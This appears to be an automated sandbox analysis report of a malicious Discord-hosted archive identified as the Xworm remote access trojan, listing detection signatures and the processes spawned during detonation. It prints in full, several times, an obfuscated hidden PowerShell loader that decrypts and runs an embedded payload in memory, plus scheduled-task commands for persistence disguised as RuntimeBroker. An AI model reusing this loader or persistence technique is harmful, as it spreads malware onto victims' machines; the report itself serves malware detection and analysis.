Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df& was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 19:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 19:53
Reported
2024-05-29 19:55
Platform
win11-20240508-en
Max time kernel
90s
Max time network
93s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2457560273-69882387-977367775-1000\{CF5ABFFC-0817-4064-9FB6-89A0BEFED940} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Classic_Tag.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_714.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_242.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_690.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff808393cb8,0x7ff808393cc8,0x7ff808393cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2416 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] 
(''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_714_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_714.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_714.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_714.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_714.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_714.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1692 /prefetch:1
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\Instructions.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7000 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] 
(''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_242_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_242.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_242.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_242.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_242.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_242.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join 